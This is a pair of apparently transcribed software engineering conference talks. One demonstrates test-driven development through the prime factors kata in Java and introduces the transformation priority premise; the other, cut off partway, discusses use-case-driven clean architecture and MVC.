you every way that you can call that API. You want to know how to create some object? There is a test, a suite of tests, that creates that object every way it can be created. And these tests are little documents. Little documents that describe how to use the system at its most detailed level. And these documents are written in a language you understand. They are utterly unambiguous. They cannot get out of sync with the application. They are so formal that they execute. They are the perfect kind of document. But never mind that. How many of you have written unit tests after writing the code? Ah, now these are all the people who said they were doing test driven development. It seems logical to us to write the code first and write the code second. But if you do it that way, then you will inevitably come across as you are writing tests. By the way, how much fun is that? It's not fun. Why isn't it fun? Because you already know the code works. You've tested it manually. You went through it all. You wrote it all. You brought it up on a screen. You did it. It works fine. Ah, now I've got to write unit tests. Why do I have to write unit tests? 
Because some process guys said I have to write unit tests. So you write them, but you write them begrudgingly. You're not happy about it. They're not fun anymore. And you write this one and you write that one and whatever. Write this one. Okay, fine. Yeah, I think I got most of it done, whatever, and you're done. Or, and this happens frequently enough, you come across the function that is hard to test. The function that you look at it and think, oh, wait a minute, if I try to test that, it'll erase every row in the database. Man, I don't think I'm going to test that when I saw it work when I tested it manually. I'll just let that one go. And you leave a hole in your test suite. If you write your test first, that can't happen. If you write your test first, you must design the code, the production code, to be testable. There will be no function that's hard to test because you can't write the function that's hard to test. You write the test first. And a testable function is testable because it's decoupled. So the only way to write testable code is to decouple it. The act of writing the test first forces you to decouple things that you hadn't thought you ought to decouple. You hadn't even thought about decoupling. You wind up with a much less coupled design when you write your test first. You also wind up, more importantly, with a test suite that covers everything. Anybody out there have a coverage number? A goal for coverage that you're trying to hit? What's your coverage goal? 100%. Is that realistic? Hell no. No one can get a 100% coverage. But that's the only meaningful goal. If your goal is 80%, then what you are saying is that it's okay if 20% of the code doesn't work. Your goal has to be 100%. Even though you cannot hit this goal. It's an asymptotic goal. It's like losing weight. You never get to your target weight. But you keep on trying to lose. What happens when you have a test suite that tests almost everything? A test suite that runs quickly, maybe in a minute, two minutes, three minutes, and it tests almost everything. It tests so much that if it passes, you are willing to deploy. That's the goal, by the way. The goal is to get the test suite to pass, and if the test suite passes, you deploy. No other QA, no other stuff after the fact, no manual testing after that. If the test suite passes, you deploy. If you had that, what could you do with it? How many of you have been slowed down by bad code? Okay, if you look around, you see that's unanimous. Why did we write it? If we know it slows us down, why would we write it? Well, there's all kinds of reasons why you'd write it. The real reason why we write bad code is because we always write bad code. It's hard to write good code. It's especially hard to write good code when we're trying to make it work. There's this problem. We've got to get something to work. All of our focus is on getting this code to work. You're writing this code, you're writing this code, and you're testing it manually, and you're writing it, you're testing it manually, and you're not working, and you write the code, and all of a sudden it works, and you back away very carefully, and you check it in, and you walk away. And of course, the code's a mess, but once you've gotten it working, you don't want to touch it. How many of you have brought code up on your screen, and your first reaction to that code is, huh, this is a mess, I should clean it, and your next reaction is, no, I'm not touching it. 
Because you know if you touch it, you will break it, and if you break it, it will become yours. So you walk away, you leave the code in a mess, you react in fear, fear of the code, fear of a change to the code. I submit to you that if you fear changing the code, the only thing that can happen to your code is that it will rot, because you will never do anything that improves it. You will only do things that make it worse, and worse, and worse, and worse, and you will continue to slow down, and slow down, and slow down until you are at a virtual stand still. Some of you may be in that position now, possibly a majority of you, maybe at that virtual stand still where estimates have grown to months that used to be weeks. Why? Because you're afraid of what happens to the code. If you had a suite of tests that you believed in that ran quickly, then that code can come up on your screen and you think, oh, I should clean that, and your next thought is, hmm, I think I'll change the name of that variable, run the tests. Oh, that didn't break anything, huh? I think I'll take that function and split it into two functions, run the tests. Oh, that didn't break anything. Huh, well, maybe I'll take that class that's a little too large, I'll split it into two classes, run the tests. Oh, that didn't break anything. If you have the suite of tests, you eliminate the fear. If you eliminate the fear, you can clean. If you can clean, you can go fast. But you need a suite of tests that you trust with your life. You need a suite of tests that is so bulletproof that you can deploy based on it. And the only way I know of to get a suite of tests that good is to write the test first, to follow the discipline. As absurd as the discipline may sound. That discipline does guarantee you a suite of tests that covers just about everything. I'd like you to consider how incredibly irresponsible and unprofessional it is to be afraid of the code you have created, to react in fear of changing this thing that you made. What do we call this stuff that we make? We call it software. And the first word there is soft. Why is that first word soft? Because we expect it to be easy to change. If we had wanted it to be hard to change, we would have called it hardware. We don't. We invented software so that we could easily change the behavior of machines. At this, our industry has failed. We make it hard to change the software. We become afraid of the software. This is an incredible failure of our industry, and it must be fixed. We are not the only industry to have faced this problem. Other industries have had the same issue. One of those industries is accounting. Even the poor accountants, how much like software is accounting? If you were to give me a thumb drive, that's a nail file. It is remarkable that I cannot tell the difference between 8 gigabytes and a nail file. 8 gigabytes. Give this to me. Put your application on it. Maybe your application is 200 megabytes. That's what? 1,600 million bits. I can find one bit in that 1,600 million. I can find one bit. Flip one bit and make your application unusable. Your application is sensitive to failure at the bit level. There are individual bits that will destroy your application. That is not true, I hope, of this theater. There's no single pulley that if it fails will have me crashing to the floor. I hope. There's no single cable which if it fails will have me crashing to the floor. I hope. We could go out on the road and take bolts out of bridges. 
They wouldn't fall down right away because as humans we don't like single points of failure. But software is loaded with single points of failure. There's probably thousands of bits in here which if I flip them will completely corrupt the application. What other industry had that problem? Accountants did. Accountants had that problem. A single digit on just the right spreadsheet at just the right time can completely corrupt the status of the books, cause the company to go into bankruptcy, send all the executives to jail. We've seen it happen. How did accountants deal with that? They invented a discipline 500 years ago. The name of that discipline is double entry bookkeeping. Every transaction gets entered two times. Once on the liability side, once on the asset side. Then they follow separate sums until there is a subtraction on the balance sheet that must yield a zero. The accountants in the old days would enter a single transaction on the liability side, the same transaction on the asset side. They would do the sums. They'd do the subtraction on the balance sheet. They'd get a zero. They knew they hadn't made an error. Then they would do the next transaction. They did not do all the assets first, all the liability second, do the sums, do the subtraction, and get a 37. I wonder which one of those was wrong. Test driven development is double entry bookkeeping. It is exactly the same discipline. It's done for precisely the same reason. Everything is said twice. Once on the production code side, once on the test side, they follow complementary execution pathways to wind up at a Boolean result, pass or fail. And we do them one transaction at a time. One little bit on the test side, one little bit on the production code side, run them, they pass. Now if you were so upset about having to write the test first, I would not complain bitterly if you wrote the code first and the test second so long as you followed the same cycle. As soon as the code doesn't compile, you make it compile by writing just enough unit test to make it compile. As soon as the code does something that the tests don't cover, you write just enough of the test to make it cover. As long as your oscillation between the two streams is 10 seconds long, I don't really care which one comes first. The problem with people who write their unit test after is not that they're writing unit test after. It's that they wait a long time before they write the unit test. Now if you've adopted this discipline, the first thing you face is just the unfamiliarity with it. It's difficult, it's odd. You've got to figure out some way to write a test, but it's hard to do that until you learn about things like test doubles and mocking and some of the other interesting techniques that come along. And as you learn those things, it gets easier. After a few weeks, it can become pretty easy, you know. So what are the deeper implications? Once you become familiar with test-driven development, what are the deeper rules? Let me show you some of them. You can see this, right? A little bit of Java code. I am going to do for you the good old prime factors kata. The prime factors kata is an exercise in test-driven development that test-driven developers do as a practice, a warm-up. Something you do in the morning just to get ready, do the prime factors kata, good, now I'm done, now I can actually get to work. Just like a warm-up exercise. The goal of this is to compute the prime factors of a given integer.
The origin of this kata comes from my son who was in sixth grade, this would have been about 2005. He came home from school with this homework, calculate the prime factors of a bunch of integers. And I said to him, well son, I'm glad to help you with this, go to your bedroom, do the best you can, by the time you're done I will have written you a program that will allow you to check your work. It won't give you the answers, but you can type in your answers and it will tell you if they're right or wrong. I sent him off to his bedroom and then I began to write this program in Ruby. I'll do it for you in Java. I sat down at my kitchen table and I thought about it for a minute. I said, how am I going to find the prime factors of an integer? And I thought to myself, well what I need is a list of prime numbers. If I have a list of prime numbers, then I could divide my candidate number by these prime numbers and any of them that divide evenly are a factor. And I'll just walk through the list of prime numbers up to some limit and that'll help me find all the prime factors. How will I compute the list of prime numbers? There's an old algorithm called the Sieve of Eratosthenes. I'll use that algorithm to create an array of prime numbers and then I will divide through by the prime numbers. That seemed perfectly reasonable to me. But I had been doing test-driven development for about five years so I was pretty new at it. And I thought to myself, wait, wait, wait. When you're doing test-driven development, you don't start with a big design. Since that time I've modified that slightly, I actually do start with big designs. I just don't believe them. So here I had a big design, big in some definition of the word big. And I thought, I'm not going to believe that design. I'm going to write the tests and let the tests lead me. And here's what happened. What you see here is the very first test right here. Note that the factors of one is the list with nothing in it. One has no prime factors. If I run this test, you will see that it fails because the factors function is returning a null. You can see that right here. Oops, sorry. You can see that right here. The factorsOf function takes an n, an integer, and it returns a null. I can make this pass by doing the simplest of changes. I'm going to take this null, which by the way is a very degenerate constant, and I'm going to transform it into a new ArrayList of integers. And of course, it wants me to import that. And now if I run my test, my test should pass. I'm a programmer. I got it to pass. The burst of endorphins rushes to your head, you know that you are a god. The machine is your slave. Time for the next test. The factors of two is the list with a two in it. The prime factors of two is just two. Oh, this fails, horror of horrors. How can I make this pass? I can make this pass by modifying my algorithm. And now watch this carefully. I still want that constant. I just don't want to return it. I'm going to have to modify it before I return it. So I'm going to transform this constant into a variable named factors. The constant is still there, but now it's held by an identifier named factors. And now I must modify that. I must put an if statement in. If n is greater than one, factors.add(2). Ha! Now most of you are thinking, well, what kind of crazy nonsense was that? There's no design there. You're just hacking an if statement in. Watch what happens to that if statement. Watch what this if statement does. It's fascinating. Next test.
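For readers following along without the screen, the tests and production code at this point look roughly like this. The class and method names are reconstructions, since the transcript never spells them out, and JUnit 4 is assumed.

```java
import static org.junit.Assert.assertEquals;

import java.util.ArrayList;
import java.util.Arrays;
import java.util.Collections;
import java.util.List;
import org.junit.Test;

public class PrimeFactorsTest {
    @Test
    public void factorsOfOneIsEmpty() {
        assertEquals(Collections.emptyList(), factorsOf(1));
    }

    @Test
    public void factorsOfTwoIsTwo() {
        assertEquals(Arrays.asList(2), factorsOf(2));
    }

    // Production code so far: the degenerate null became a named constant,
    // and a single if statement is enough to pass both tests.
    public static List<Integer> factorsOf(int n) {
        List<Integer> factors = new ArrayList<Integer>();
        if (n > 1)
            factors.add(2);
        return factors;
    }
}
```

Both tests pass against that one if statement, which is all the third law allows so far.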
The factors of three is a list with a three in it. This should fail. Notice now I'm getting into a hypothesis experiment loop. I write the test. I expect it to fail. That's my hypothesis. Ah, my hypothesis is correct. It fails. Ah, now I must make it pass. And to make this pass, we're going to play a game of golf. Golf in programming, in test driven development, is to make the test pass with the fewest key strokes possible. How do I make this test pass with the fewest key strokes possible? Two to n. Note that that was a change from a constant to a variable. A change from something specific to something more general. In fact, if you think carefully now, all the changes we have made to the production code have been a change towards generality. Every change has made the production code a little bit more general. I didn't have to do that. I could have put more if statements in. I could have said if n equals one, return a two. If n equals three, return a three. If n equals four, return a two and a two. I could have done that. But that would violate this new rule that we're beginning to smell. And the new rule that we're beginning to smell is this. With every new test, the tests become more and more constraining. The tests become more and more specific. Our response on the production code side is to make the production code more and more general. So everything we must do on the production code side must be a move towards generality. As the tests get more specific, the code gets more generic. Let's see if that works. Factors of four is a list with a four in it. No. Where are my pair programmers? The list with a two and a two in it. This should fail. Yeah, fails. How do I get that to pass? Well, if I look at this code here, I think, well, I can get this to pass by putting braces around this because I still need to know that n is greater than one. The only time I want to return an empty list is if n is equal to one. Then here I'm going to say if n is divisible by two, boy, do I hate that code, then I can add two. So if it's divisible by two, I will put a two in the list. And then, and then, and then, I will reduce n by two. So I pull the factor out of n, falling out of the loop. And I look at this and say four. Four will work because it's greater than one. It is divisible by two. I will put the two in the list. I will convert the four to a two, and I will put the second two in the list. And that will work. It doesn't work. Oh. But the test that failed was the test for the number two. Look at that code again. So I put a two in the list, if I am doing the prime factors of two, well, two is greater than one. Two is divisible by two. I will put the two in the list. I will convert the n to a one, and I will add it. I never want a one in there. So I'll put another if statement in. And now you are completely convinced that all I'm doing here is hacking away at this. You're just adding if statements. But that if statement is an interesting one. It's the same as the one above it. It's the same predicate. Now when you have two if statements in a row, in fact, I can make this a little more interesting. I can take this if statement. I can move it completely out of the loop. That still passes. So now I have two if statements in a row with the same predicate. And that should smell to you like an unwound loop. That last if statement looks like the end condition of a loop. But never mind. We have more tests to do. Factors of five is the list with a five in it, because five is prime. Pass or fail? Pass. 
That's nice. Okay. The factors of six is the list with a two and a three in it. Pass or fail? Pass. That makes sense though. Six is divisible by two. Take the two out, leaves the three, puts the three. Yep, works fine. Yep, good. Okay. Factors of seven is the list with a seven in it, because seven is prime. Pass, three in a row. Three in a row. As bad as that algorithm looks, there's something right about it. Oh, you'll see. He asked me how I know when to stop. You'll see. Oh, yeah. Don't worry about that. I didn't want that up there. Go and build. Thank you. They've changed the key bindings, nasty little people. All right. Next test. Factors of eight is the list with two and two and two in it. Eight is two cubed. This will fail. There's nothing in my code that will put three things in the list. Yes, it fails. It puts a two and a four in the list. That makes perfect sense. How can I get this to pass? And now we'll play another game of golf. How can I get this to pass with the fewest possible keystrokes? Recursing, he says. There's a faster way. Turn the if into a while. I sat at my kitchen table. I turned that if to a while. I saw it pass and a chill went down my spine. What happened there? And it occurred to me. A while is a general form of an if statement. An if is a degenerate form of a while loop. Again, this is a move towards generality. I have made the code more general simply by letting the if statement continue until it was false. That's interesting. Let's do nine. Nine is three squared. That should fail because nothing will put a three in there two times. It does fail. Actually, it failed by sticking a nine in there. How can I make this pass? I look at this code and I realize that right here, I have a little engine, a little loop that factors out all the twos. Now I could repeat that loop like so. I will take a copy of that. And I will paste that copy in there and I will turn all the twos into threes. So now I have a loop that takes out all the threes and I believe that that will pass. Yes, but that violates my rule. Actually, it violates several rules. By duplicating that loop, I have not made the code more general. In fact, I've made the code more specific. It is now tuned to three. Secondly, I've duplicated code. That's bad. So I'm going to get rid of this. I know what I want to do now. I just need to do it in a more general way. And a more general way would be to put this code here into another loop, modifying the two. So the first thing I'm going to have to do is change that two to a variable named divisor. The next thing I'm going to have to do is take this code here and put it into a loop. When will that loop end? When n is reduced to one. When I have found all the factors of n, n will have been reduced to one. So I will execute this loop while n is greater than one. Look what happened to that if statement. Of course, I need to take the initializer outside of the loop now. And I'd better increment that divisor. That works. Fascinating. Ah, but, but. There's some cleanup I could do here. Because this loop cannot exit until n is one. Which means this if statement no longer applies. It really was the terminating condition on an unwound loop. There's a little bit of cleanup I can do here still. While loops are wordy, let's turn them into for loops. This one is a simple for loop. It has no initializer. It does have an incrementer. The incrementer is just that. Let me get rid of that. I think that works. Yeah, that works. Now I can get rid of those horrible braces.
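At this point, reconstructing from the description since the screen itself isn't captured in the transcript, the production code looks roughly like this:

// assumes java.util.List and java.util.ArrayList are imported
private List<Integer> factors(int n) {
    List<Integer> factors = new ArrayList<Integer>();
    int divisor = 2;
    while (n > 1) {
        while (n % divisor == 0) {   // pull this divisor out as many times as it divides n
            factors.add(divisor);
            n /= divisor;
        }
        divisor++;                   // then try the next divisor
    }
    return factors;
}

Every test posed so far passes against this version.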
I am on a mission to destroy all braces. I know, I know you're supposed to put braces in around every if statement and every while loop. But I have a different view of this. I'm going to work hard to make every while loop and every if statement one line long and then they don't need braces. If you want to put the braces in, you put them in. Oh, I think I can change that to a for loop. And the initializer of that for loop is right there. And the incrementer of that for loop is right there. I think that will still work. And I don't need these ugly braces anymore. Let's get rid of those. Well, that's a nice pretty little algorithm, isn't it? I wonder how it works. Let's see if it does work. Okay, we need some big number with lots of prime factors. Two times two times three times three times five times seven times 11 times 11 times 13. That's a bunch of prime numbers. Is a list of, let's take that and move it down. And we'll say two comma two comma three comma three comma five comma seven comma 11 comma 11 comma 13. Oh, we're done. We're not actually done. Well, we're done. There's a small improvement you can make to speed the algorithm up in the case of very large prime numbers. You don't need to loop while n is greater than one. You can loop until n is greater than the square root of the original n. But and that'll speed things up by a fair bit in the case of very large prime numbers. Other than that, however, this is the algorithm. Notice that it has nothing to do with finding a bunch of prime numbers and dividing through by prime numbers. It's an entirely different algorithm. Where did this algorithm come from? Well, it came out of my brain, obviously. I was sitting at the kitchen table. I developed this algorithm one little test case at a time. It's not like it magically happened. And yet it did not come about because I thought it through. I did think it through. I just didn't think it through beforehand. I thought it through while I was developing it. One little test case at a time. This implies that it is possible to create algorithms incrementally, to solve algorithmic problems incrementally, one test case at a time, if you follow the rule that everything you do to the production code becomes more and more general. If you think about that long enough, you'll realize, yes, the tests get more and more constraining, the code gets more and more general. At some point, it gets general enough to pass every test. Is it possible to derive algorithms incrementally one test case at a time? In this case, it certainly was. Is it generally possible? Let's do a thought experiment. You and I? The sort algorithm. I'm going to hand you an array of integers. I want to know what test cases you would pose in order to pass a sort algorithm and what changes you would make incrementally to that sort algorithm to make them pass. We will begin. What is the very first test case? No integers at all, an empty array. We always start with the most degenerate case. The most degenerate case is an empty array. Sorting an empty array is trivial. How do you solve it? You return an empty array. Okay. First test case is now passing. Second test case. One integer doesn't matter what the integer is, it's already sorted. This fails. It fails our current implementation, which returns an empty list. How can we make it pass? Return the input array. Notice how similar that was to returning the N. We had a 2 at first, then we returned an N. In this case, we will return the empty array. Interesting. 
Now, we will return the input array. Next test case. Two integers in order. Passes. Next test case. Two integers out of order. Fails. How do we make it pass? Switch them if they're out of order. So there's an if statement. Oh, that's similar to this, isn't it? An if statement. And if that if statement fails, we swap them. Remember you said that. Right? Yeah. Remember you said that. Passes. Next test case. Three integers in order. Passes. Three integers with the first two out of order. Passes. Three integers with the second two out of order. Fails. How do we make this pass? By making the code more general. You put the if statement with the swap into a loop. And you loop through the array, swapping if they're out of order. Passes. Three integers in reverse order. Fails. Because you swapped the first two, you swapped the second two, but the first two are still out of order. How do you make that pass? Put the loop that compares and swaps into another loop. That's actually one element shorter. What have we invented? Bubble sort. The worst possible sort algorithm. So maybe test-driven development is a great way to derive terrible algorithms. But this guy here gave us an answer to one of those early test cases. Two elements out of order. And he said compare them and swap them. There was a different way to make that test pass. It was not necessary to compare and swap them. What you could have done instead is to compare them and then return wholly new arrays, allocate brand new arrays out of whole cloth and put the elements in the right order. Not changing the existing array, creating a new array. Those of you who attended my last talk will recognize that as the functional solution. Swapping the elements inside the existing array is non-functional because we're using assignment to do it. Now, it turns out, and I won't do this derivation for you, I'll let you do this at home because it's fascinating. It turns out that if you take that course, you put in the if statement and you create completely new arrays, you very quickly wind up at a quicksort. The quicksort falls out. The quicksort is probably the best possible sort algorithm. So apparently, there are forks in the road. As you are writing tests, there are choices you can make. Maybe two or three different ways to make a test pass. And if you choose the right course, you get to a better algorithm. What criteria can we use to make that choice? And it turns out, there are a whole list of possible things that you can look for, but the first thing to look for is assignment. If your solution involves assignment, find a solution that does not. If no such solution exists, then you have to go on with assignment. But if you can do it without assigning, you may wind up at a better algorithm. This is called the transformation priority premise. The premise that production code can be transformed into ever more general states. And there is a priority to the order in which you make those transformations. You prefer transformations that don't have assignment in them. There's a whole bunch of other preferences. If you look up the transformation priority premise, you will see the list of transformations and the priorities among them. You'll find the documents on this interesting. They cover the sort algorithm. They cover Fibonacci. They cover a bunch of algorithms. And it's something interesting to try on your own. Which brings me right to the end of the talk so I can take one question. Anybody out there want to ask a question? Yeah, in the back.
So the cycle in test driven development is supposed to be red, green refactor. Yes, that's true. And your question was that sometimes my tests passed immediately. Yeah, that does happen from time to time. Sometimes you pose a test that you think will fail and it doesn't. It passes. Okay. Then you don't have to go through the rest of the cycle. You thought it was going to be red, it turned green. That's a benefit. It doesn't happen very often, but it does happen. And with that, thank you all for your attention. See you next time. Thank you.
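For reference, the final form of the prime factors function described in this talk, after the if-to-while transformation and the collapse into for loops, comes out roughly like this. It is a reconstruction rather than the exact code shown on screen.

// assumes java.util.List and java.util.ArrayList are imported
private List<Integer> factors(int n) {
    List<Integer> factors = new ArrayList<Integer>();
    for (int divisor = 2; n > 1; divisor++)         // the old "while n > 1", now a for loop
        for (; n % divisor == 0; n /= divisor)      // the old inner while, now a for loop
            factors.add(divisor);
    return factors;
}

The square-root optimization mentioned near the end of the kata, for very large primes, is deliberately left out of this sketch.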
|
Once you start to get good at TDD, you begin to learn the nuances of the discipline, such as the fact that tests and code grow in opposite directions. As the tests get more specific, the code gets more generic. You also begin to learn that in the red/green/refactor cycle there are just a few standard gestures that move a test from red to green. In this talk, Uncle Bob will discuss those gestures, called transformations, and will present the idea that, when applied in a particular order and priority, they can have a profound effect on the resulting code. This one is at the bleeding edge of TDD research and will leave you with something to ponder.
|
10.5446/50860 (DOI)
|
[The opening minutes of this transcription are unintelligible.] ... you think of the electrons as waves, not particles. Then where would those waves like to be? Those waves would like to be mostly between the protons, the protons in the hydrogen atoms and the protons in the oxygen atom. So those electron waves will congregate more between the atoms than everywhere else. They still go everywhere else. [unintelligible] ... hold a charged object near the stream of water and watch the water bend toward it; that's all the water molecules turning around and getting attracted to the electric charge. Of course that's not what we're supposed to be talking about. The name of the talk I'm about to give you is called Architecture: The Lost Years. It's a talk I've been doing now for several years. It's about the next step after clean code. [unintelligible] ... I was learning rails at the time and I wrote this application and I followed the book, right, you get the books out, you follow the book, you follow all the recommendations of the book, and that's what I wound up with. And I was happy with that and I put the application away and I didn't look at it again for a very long time. Then about three years ago, my son at my request wrote an application and I looked at it and I saw that. Same directory structure. These were two completely different applications. They had nothing to do with each other, but they had the same directory structure and I looked at it and I thought, wait, why do these two applications have the same high level directory structure? They're two completely different applications, and it occurred to me that they had the same directory structure because they were both rails applications. And I asked myself, okay, but why is that important? Why is rails or any framework so important that it would dominate the high level directory structure of an application? And the reason I asked that question of myself was because of this. The web is a delivery mechanism. The web is an IO channel. The web is not architecturally significant. We think of ourselves as writing web applications. We're not writing web applications. We're writing applications that happen to deliver their content over the IO channel known as the web. And why should that IO channel dominate us? Does anybody remember when the web became important? 98, 99? Anybody remember what a change that was? How radically different everything was? Except that it wasn't. Because we weren't really doing anything new. We were just gathering input from an input source, processing it, and spitting it out to an output source. That's all the web is. Why would the web dominate so much? So I started thinking about architecture. And I started looking at blueprints. There's a blueprint.
And if you didn't have the word library staring at you, it wouldn't take you long to figure out that it was a library. Because it's obviously a library. You've got a bunch of bookshelves in there. You've got a bunch of reading tables. There's little computers sitting on tables. There's an area up front where you have the desk where you can borrow or return books. It wouldn't take you long to look at that and think, hmm, that must be something like a library. Or, here's another one. That's a church. It's obviously a church. Oh, you might mistake it for a theatre. Theatres and churches do have a certain synergy to them. But no, this is definitely a church. The pews, the altar, the classrooms around the outside, the greeting area around the front. This is clearly a church. The architecture of these buildings is not telling you how they're built. The architecture of these buildings is telling you what they are for, their intent. Architecture is about intent. And the high-level structures of those rails apps were not communicating intent to me. They were telling me that they were rails apps. There's something wrong with that. And then it occurred to me. This is a known problem. It's a solved problem. It was recognized and solved by Ivar Jacobson in 1992 when he wrote this book. Who's got this book? Anybody read this one? I've got a guy here. Anybody else? Object-Oriented Software Engineering? A few of you. Wonderful book. It's 1992. It's a little bit old, but it doesn't matter. The principles inside it are still perfectly good. Notice the subtitle. The subtitle says, a use case-driven approach. Who remembers use cases? See, it was very popular in the early 90s. Big, big deal. In fact, it was so popular that it was utterly destroyed by all the consultants who invaded the realm and ruined what use cases were supposed to be. You may recall, if you remember that era, that one consultant after another would publish on the internet their own particular format for a use case. And the format became all important. We had PDFs that were out there that forced you to fill in the blanks of a standard use case form. And you had to fill in the name of the use case and the inputs to the use case and the preconditions and the post conditions and the primary actors and the secondary actors and the tertiary actors. What the hell is a tertiary actor? You had to fill in all this stuff and the whole problem of use cases became one of form instead of one of function. And right about the peak of that era, the agile movement began and we stopped talking about use cases and we started talking about stories and the whole use case thing fell on the floor and nobody talked about it again. And so I brought it up again and I read through the book again, and I remembered what Jacobson wrote. Here is a use case, typical of the kind of use case that Jacobson would have written. If you notice it has very little form, oh a little bit, it's got a name up there, create order. Imagine that this is a use case for an order processing system. And it's got some input data like the customer ID and the customer contact information and the shipment destination. Notice that I am not supplying any details. I'm not saying what the customer ID is, whether it's a number or a string, I don't care. I'm not saying what the customer contact info is. I assume it's got a name and a date and an address and a few other things, but I don't care. I'm not trying to specify detail here.
And then you've got the primary course and the primary course is the set of steps that the computer will undertake to satisfy the use case. These are the processing steps. And the first one is that the order clerk issues the create order command. That's actually not something the computer does. And then the second step is the system validates all the data. Notice I don't say how. Just validate it somehow, it doesn't matter. The third step is the system creates the order and determines the order ID. I presume that's some kind of database operation, but I'm not going to say that here. And the fourth step is that the system delivers the order ID to the clerk, probably on a web page, but I'm not going to say that. In fact, this whole use case says nothing about the web. This use case would work no matter what the input output channel was. I could make this use case work on a console app, a desktop app, a web app, a service-oriented architecture app, an iPhone app, it doesn't matter. Because the use case is agnostic. It doesn't care about the IO channel. Jacobson said, you can take that use case and turn it into an object. He called the object a control object. I've changed the name to an interactor to avoid confusion with model view controller. Maybe I should have changed the name to use case, but I didn't. Interactor is what I've written here. The interactor object implements the use case. It takes as its input the use case input. It delivers as its output the use case's output. And it implements at least at a high level the rules, the processing steps of the use case. Notice there's a caption below there. It says, interactors have application-specific business rules. There are two kinds of business rules. There are the kinds of business rules that are global. They are true no matter what the application is. They are application-independent business rules. And then there are other business rules that are tied to the application you are writing. So, for example, let's say that we've got an order entry application and an order processing application. Two completely different applications. Both of them might have an order object, and that order object might have common business rules, regardless of which of the two applications you are inside. But only one of those applications would have an insert order use case. So, use cases are application-specific. They are bound to the particular application they are in. Business rules that are not application-specific are bound to entity objects. Some people would call these business objects. I don't like the term, so I'll call them entities. That's what Jacobson called them as well. You put all of the application-independent business rules into your entities, and the interactor will control the entities. Then you have to figure out a way to get the input and the output into and out of the use case. We do that in this case with interfaces. I have drawn these as object-oriented interfaces. Notice that the interactor uses one of the interfaces and derives from the other. The one it derives from is the input interface. The one it uses is the output interface. Notice that the arrows point in the same direction. That's important. We'll come to why that's important in a minute. So, these are the three objects that Jacobson identified as part of his architecture for applications. Now, let's trace this through. Let's see how it would work. This is a typical application. I've got some user out there. That's that little man standing there.
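Before the flow gets traced through, here is a sketch of what those three kinds of objects might look like in Java. The names are hypothetical, chosen to match the create order use case above rather than taken from the slides, and each of these would live in its own file.

// Request and response models: plain data structures, no methods, no web trappings.
public class CreateOrderRequest {
    public String customerId;
    public String customerContactInfo;
    public String shipmentDestination;
}

public class CreateOrderResponse {
    public String orderId;
}

// The input boundary: the interface the interactor derives from.
public interface CreateOrderInputBoundary {
    void createOrder(CreateOrderRequest request);
}

// The output boundary: the interface the interactor uses to deliver its result.
public interface CreateOrderOutputBoundary {
    void present(CreateOrderResponse response);
}

// The interactor: application-specific business rules, driving the entities.
public class CreateOrderInteractor implements CreateOrderInputBoundary {
    private final CreateOrderOutputBoundary output;

    public CreateOrderInteractor(CreateOrderOutputBoundary output) {
        this.output = output;
    }

    public void createOrder(CreateOrderRequest request) {
        // validate the data, command the order entity, determine the order id...
        CreateOrderResponse response = new CreateOrderResponse();
        // response.orderId would be filled in from whatever the entities report back
        output.present(response);
    }
}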
That little man is an actual real person. That real person is interacting with the system through some delivery mechanism. Maybe it's the web. Maybe it's not. Who cares? The person, the user, pushes some buttons or types on the keyboard or does something that stimulates the system to accept data. A delivery mechanism, maybe it's the web, maybe it's something else, doesn't matter, translates that into the creation of something called a request model. A request model is a pure data structure. A plain old .NET object or a plain old Java object, a raw data structure. It has no idea where the data came from. There are no trappings of the web on it, if there are any trappings of the web anywhere. It's just a plain old data structure. No methods on it. No nothing. A bunch of public elements in a data structure. It contains all the input data. That gets passed into an interface, the input boundary interface, which the interactor derives from. The interactor receives the request model and reads it and interprets it and turns it into a set of smaller commands which it sends to the entities. All the little business objects out there. It controls the dance of all the method calls to the entities. Once the job is done, then it reverses the flow. It queries those entities and says, okay, what happened to you? As a result of that, it builds up yet another data structure called the result model. The result model is still just a plain old data structure. Nothing new about it. Just a plain old .NET or Java object, a bunch of public fields. No methods. That result model gets passed through the output boundary to the delivery mechanism where it gets displayed somehow to the user. That's the flow of just about any application. Could you test that interactor? Be easy, wouldn't it? Create the input data structure, invoke the interactor, look at the output data structure. Do you have to have the web server running to do that? No, because the interactor is just a plain old Java object or a plain old .NET object. So are all the data structures. Do you have to have the database running to do that? Well, you might, but we'll deal with that in a minute. I can test this without the delivery mechanism in place at all. If my delivery mechanism is the web, I don't care. I don't have to have the web server running. I don't have to test it with web pages. I can test the functioning of the system without going all the way from the inputs to the outputs. What about MVC? Isn't MVC the thing we're all supposed to be doing? What does MVC stand for? Model View Controller. Who invented it? That guy. And now I'm going to completely mispronounce his name and you can probably say it better than I. But I'm going to call him Trygve Reenskaug. You can probably say it better than me. I met him once. This is the guy who invented Model View Controller in the late 1970s. I met him once. I met him here at this conference two years ago. I was up in the speakers lounge and I was hunting for a power outlet. And this old guy walks up to me and hands me a power outlet and I look up and it's Trygve Reenskaug. And as he handed me the power outlet, our fingers touched. I haven't washed that hand. It's Trygve Reenskaug. Some people came up and took their picture with me today. I'm a fanboy too. In the early 80s, late 70s, Trygve Reenskaug came up with this structure. It's called Model View Controller. He did this on the Smalltalk platform. And the idea behind it was very simple. You've got a model object. The model object contains your business rules.
It does not know how it's displayed. It does not know where the input comes from. It's pure business rules. Nothing more. There's a controller down there. The controller handles all the input. The job of the controller is to look at whatever the input device is. Keyboard doesn't matter. And translate the actions of the user into commands to the model. Then you've got the view. And I've drawn the view with that funny double arrow. That's an observer relationship. The view registers with the model. And whenever the model is changed, it calls back to the view, telling the view to re-display. The job of the view is to display or represent or somehow convey the contents of the model to something else. It works nicely on a graphical user interface. It also works just as well on a console device or a service-oriented architecture or any other kind of application you wish. You have something that controls input, something that controls process, something that controls output. This, probably the very first named design pattern ever, was meant to be used in the small. You would have a model view controller for a button. You'd have a model view controller for a checkbox. You'd have a model view controller for a text field. We did not have model view controllers for a screen. Since those early days, this has been twisted and warped and turned because, like anything in software, if it turned out to be a good idea, everyone else will copy it and use the same name for something completely different and call it good. This happened with OO, it happened with structured, it happened with objects, it happens with agile, it happens with anything. If the name is connected with something good, then someone else will connect the name with their stuff and try and call it good. That's what happened with MVC now. Nowadays, we have these MVC frameworks. They don't look anything like that. They're not model view controller in the sense of a trig v aren's count model view controller. They're something very different. They kind of look like this. Here you've got a bunch of controllers up there. Now, the controllers, if we think of the web, the controllers are somehow activated by the web framework in the sky. The web framework in the sky, whatever it is, who cares, rails or spring or God knows what, will somehow route the complicated and horrible URLs that come from the web to a set of functions that we call 